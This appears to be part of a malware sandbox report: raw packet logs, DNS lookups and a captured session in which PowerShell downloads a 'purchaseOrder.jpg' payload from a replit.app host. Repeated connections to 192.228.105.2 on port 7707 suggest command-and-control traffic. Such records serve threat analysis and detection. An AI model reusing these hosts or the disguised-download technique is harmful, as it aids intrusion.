                    Jul 30, 2024 11:11:25.125025988 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.125032902 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.125353098 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.125401020 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.125407934 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.125497103 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.125544071 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.125550032 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.125616074 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.125674963 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.125682116 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126300097 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126348972 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.126354933 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126439095 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126509905 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.126512051 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126540899 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126583099 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.126627922 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126805067 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126849890 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.126857042 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126945019 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.126995087 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.127002001 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127072096 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127114058 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.127120018 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127199888 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127245903 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.127254009 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127367973 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127414942 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.127420902 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.127954960 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128002882 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.128010035 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128110886 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128154039 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.128161907 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128268003 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128314972 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.128323078 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128417015 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128468990 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128478050 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.128500938 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128539085 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.128659010 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128730059 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128765106 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128822088 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128878117 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.128885031 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128905058 CEST4434970534.117.33.233192.168.2.7
                    Jul 30, 2024 11:11:25.128954887 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.154752970 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:25.171298981 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:27.045939922 CEST49705443192.168.2.734.117.33.233
                    Jul 30, 2024 11:11:27.642587900 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:27.642699957 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:27.642805099 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:27.653386116 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:27.653429031 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:28.561892033 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:28.561991930 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:28.567410946 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:28.567441940 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:28.567754030 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:28.622092009 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:28.626204014 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:28.672511101 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.169459105 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.169483900 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.169524908 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.169533968 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.169600964 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.169629097 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.170367956 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.170430899 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.170442104 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.170486927 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.277364016 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.277482986 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.277782917 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.277848005 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.278414965 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.278481960 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.279275894 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.279335022 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.280133009 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.280200958 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.280311108 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.280363083 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.281272888 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.281328917 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398062944 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398196936 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398222923 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398293018 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398332119 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398334980 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398355007 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398371935 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398416996 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398483992 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398552895 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398570061 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398637056 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.398808002 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.398875952 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.399585962 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.399665117 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.399677992 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.399705887 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.399751902 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.400279045 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.400338888 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.400352955 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.400614977 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.400677919 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.400691032 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.400752068 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.401184082 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.401256084 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.401268959 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.401329041 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.401351929 CEST44349706194.15.112.248192.168.2.7
                    Jul 30, 2024 11:11:29.401413918 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:29.578694105 CEST49706443192.168.2.7194.15.112.248
                    Jul 30, 2024 11:11:41.883140087 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:41.891181946 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:41.891243935 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:41.944381952 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:41.950793982 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:42.572976112 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:42.574784994 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:42.574845076 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:42.580960035 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:42.588305950 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:42.753554106 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:42.865139961 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:43.880314112 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:43.886244059 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:43.886292934 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:43.892863035 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:54.656666994 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:54.708926916 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:54.768595934 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:54.818300962 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:56.834966898 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:56.841068029 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:56.841213942 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:56.847827911 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:57.104896069 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:57.146433115 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:57.207365990 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:57.247070074 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:57.252007008 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:11:57.252481937 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:11:57.257560968 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:09.787682056 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:09.797291040 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:09.797363997 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:09.803221941 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:10.067703962 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:10.115319967 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:10.176136017 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:10.178042889 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:10.183605909 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:10.183675051 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:10.214881897 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:22.741296053 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:22.750185013 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:22.750278950 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:22.755950928 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:23.020643950 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:23.068381071 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:23.156191111 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:23.159008026 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:23.172039032 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:23.172107935 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:23.189893961 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:24.673587084 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:24.724610090 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:24.810000896 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:24.865298033 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:35.693939924 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:35.699623108 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:35.699703932 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:35.707343102 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:35.962781906 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:36.006215096 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:36.066915989 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:36.069514990 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:36.074518919 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:36.074606895 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:36.079580069 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:48.647382975 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:48.658643961 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:48.658709049 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:48.664192915 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:48.940399885 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:48.990319967 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:49.050905943 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:49.053261042 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:49.058335066 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:49.058451891 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:12:49.064728022 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:54.825933933 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:54.826040983 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:12:54.826103926 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:01.600326061 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:01.609016895 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:01.609196901 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:01.616106033 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:01.798290968 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:01.849813938 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:01.911514044 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:01.915775061 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:01.920732021 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:01.920815945 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:01.925690889 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:14.553735018 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:14.559242010 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:14.560513973 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:14.565377951 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:14.828023911 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:14.881037951 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:14.964231014 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:14.966150999 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:14.976465940 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:14.976531982 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:14.981419086 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:24.684362888 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:24.724740028 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:24.819583893 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:24.865360975 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:25.990653038 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:25.995861053 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:25.995924950 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:26.001221895 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:26.250477076 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:26.302862883 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:26.364144087 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:26.364816904 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:26.370316029 CEST770749712192.228.105.2192.168.2.7
                    Jul 30, 2024 11:13:26.370400906 CEST497127707192.168.2.7192.228.105.2
                    Jul 30, 2024 11:13:26.376043081 CEST770749712192.228.105.2192.168.2.7
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 30, 2024 11:11:21.202904940 CEST5340653192.168.2.71.1.1.1
                    Jul 30, 2024 11:11:21.236555099 CEST53534061.1.1.1192.168.2.7
                    Jul 30, 2024 11:11:27.613209009 CEST5175553192.168.2.71.1.1.1
                    Jul 30, 2024 11:11:27.637702942 CEST53517551.1.1.1192.168.2.7
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 30, 2024 11:11:21.202904940 CEST192.168.2.71.1.1.10xf840Standard query (0)secured-order-download-businessportal.replit.appA (IP address)IN (0x0001)false
                    Jul 30, 2024 11:11:27.613209009 CEST192.168.2.71.1.1.10xbfc6Standard query (0)oshi.atA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 30, 2024 11:11:21.236555099 CEST1.1.1.1192.168.2.70xf840No error (0)secured-order-download-businessportal.replit.app34.117.33.233A (IP address)IN (0x0001)false
                    Jul 30, 2024 11:11:27.637702942 CEST1.1.1.1192.168.2.70xbfc6No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                    Jul 30, 2024 11:11:27.637702942 CEST1.1.1.1192.168.2.70xbfc6No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                    Jul 30, 2024 11:11:27.637702942 CEST1.1.1.1192.168.2.70xbfc6No error (0)oshi.at188.241.120.6A (IP address)IN (0x0001)false
                    Jul 30, 2024 11:11:38.460988998 CEST1.1.1.1192.168.2.70xef38No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                    Jul 30, 2024 11:11:38.460988998 CEST1.1.1.1192.168.2.70xef38No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                    • secured-order-download-businessportal.replit.app
                    • oshi.at
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.74970434.117.33.2334437736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    2024-07-30 09:11:21 UTC210OUTGET /purchaseOrder.jpg HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                    Host: secured-order-download-businessportal.replit.app
                    Connection: Keep-Alive
                    2024-07-30 09:11:22 UTC263INHTTP/1.1 200 OK
                    Content-Length: 187448
                    Content-Type: image/jpeg
                    Strict-Transport-Security: max-age=63072000; includeSubDomains
                    Date: Tue, 30 Jul 2024 09:11:21 GMT
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close
                    2024-07-30 09:11:22 UTC1390INData Raw: ff d8 ff e1 00 8b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 0f 00 02 00 00 00 08 00 00 00 56 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 5e 01 1b 00 05 00 00 00 01 00 00 00 66 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 15 00 00 00 6e 00 00 00 00 42 65 46 75 6e 6b 79 00 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 42 65 46 75 6e 6b 79 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e2 01 d8 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00
                    Data Ascii: ExifMM*V^f(1nBeFunky,,BeFunky Photo EditorJFIF,,ICC_PROFILE0mntrRGB XYZ acsp
                    2024-07-30 09:11:22 UTC1390INData Raw: db a9 cd f5 3e 1b b7 56 c5 d2 46 03 ff 00 32 a3 fe 2b 56 66 d3 8a b0 9d ea 41 1d 05 65 2c cf 3d 41 92 35 c5 0e 78 66 79 7d 49 28 42 b4 5b 7c ae 8d 13 9b ea 7c 37 6e a7 37 d4 f8 6e dd 53 58 a0 a5 70 04 31 a4 1d a0 86 af bc df 4d e1 b7 75 0e e2 13 e6 fa 9f 0d db a9 cd f5 3e 1b b7 54 d9 cd f4 de 1b 77 53 9b e9 bc 36 ee a0 21 3e 6f a9 f0 dd ba 9c df 53 e1 bb 75 4d 9c df 4d e1 b7 75 39 be 9b c3 6e ea 02 13 e6 fa 9f 0d db a9 cd f5 3e 1b b7 54 d9 cd f4 de 1b 77 53 9b e9 bc 36 ee a0 21 3e 6f a9 f0 dd ba 9c df 53 e1 bb 75 4d 9c df 4d e1 b7 75 39 be 97 b8 cf 44 04 27 cd f5 3e 1b b7 53 9b ea 7c 37 6e a9 b3 9b e9 bc 36 ee a7 37 d3 78 6d dd 40 42 7c df 53 e1 bb 75 39 be a7 c3 76 ea 9b 39 be 9b c3 6e ea 73 7d 37 86 dd d4 04 27 cd f5 3e 1b b7 53 9b ea 7c 37 6e a9 b3 9b
                    Data Ascii: >VF2+VfAe,=A5xfy}I(B[||7n7nSXp1Mu>TwS6!>oSuMMu9n>TwS6!>oSuMMu9D'>S|7n67xm@B|Su9v9ns}7'>S|7n
                    2024-07-30 09:11:22 UTC1390INData Raw: f4 95 f2 3b e5 ba 9d af 39 9c ba c2 81 ed bc 2c a8 24 74 94 f2 c9 f8 d2 75 58 35 ba ca ca e9 9f 0e dc af b8 36 db 4d 43 1c 8e 74 94 cc 6f c8 04 9e a5 50 59 a0 2b f5 b5 b4 f7 aa 88 a6 d5 63 c4 8f 66 a9 ea cf 35 b9 ff 00 4d f0 b2 72 c3 53 93 e2 d2 ff 00 62 ef 61 fd 3f 3e aa e1 0b 2a d8 e8 e0 99 c0 35 ee 39 34 e6 a6 db fe 91 68 ad b6 88 ee 8c 91 ae 8d cc d7 39 38 1d 9d 6b cf f9 e8 aa 6e 90 d0 50 5b 68 a4 8e aa 07 35 ae 73 58 43 b6 6c 53 d3 30 36 23 ab c2 0f a5 ad 32 93 c9 f2 01 d9 ec d8 86 e6 62 af 84 b5 ae 39 5b 1c 72 82 43 b2 7e 47 2c bf ad ab 71 66 9d ac cf b7 45 52 da 98 f8 c9 18 0e ae b0 d6 cc aa 2a ed 10 de db 25 73 8c 73 17 17 b8 b0 96 9d 9b 73 5d 7a 8d 1a e2 fb 7d 0b 6a 8f 2a 31 44 43 c3 32 3d 41 01 73 ab f4 ee 69 2a 20 7b b3 14 ef 23 e5 67 b0 8d 9f
                    Data Ascii: ;9,$tuX56MCtoPY+cf5MrSba?>*594h98knP[h5sXClS06#2b9[rC~G,qfER*%sss]z}j*1DC2=Asi* {#g
                    2024-07-30 09:11:22 UTC1390INData Raw: 64 16 e3 cc 12 f6 35 39 82 5e c6 a0 35 74 5b 47 30 4b d8 d4 e6 09 7b 1a 80 d5 d1 6d 1c c1 2f 63 53 98 25 ec 6a 03 57 45 b4 73 04 bd 8d 4e 60 97 b1 a8 0d 61 bd 63 eb 52 6e 10 cd b2 c4 4f 56 b7 5a d7 a2 c3 f2 6b 82 e0 32 07 3d 81 6e 36 fa 71 44 19 ab b0 b5 01 37 55 51 9b 85 8e 7a 66 f5 cb 4e 59 ea 17 80 dc 30 78 04 e2 9d 26 e3 0a 9b cd ae 27 b8 49 31 78 2c 69 f7 9e b5 ee 8d b3 12 f1 31 b6 37 9c c0 d8 73 2b b9 25 ea db 31 ce 58 22 90 f6 b9 a0 a1 f0 fb 71 b0 59 36 de 65 eb 2f ce 23 78 27 73 f9 9c c3 3f d9 bf a4 68 a9 b9 2d 49 a9 10 ea e5 aa 75 8e 6a e7 70 5f e0 23 75 d1 b6 2c a6 bc d6 44 e0 63 94 48 5c e6 9f 72 f6 49 b7 7b 53 7e 6d 34 23 ea 60 5c d1 df a8 22 20 c7 13 1a 47 60 01 64 e9 27 2b 9f 9d e4 fe 4f 7b 19 93 e6 54 73 3a 0a 4e 74 da 71 bb ee 32 f4 d8 76
                    Data Ascii: d59^5t[G0K{m/cS%jWEsN`acRnOVZk2=n6qD7UQzfNY0x&'I1x,i17s+%1X"qY6e/#x's?h-Iujp_#u,DcH\rI{S~m4#`\" G`d'+O{Ts:Ntq2v
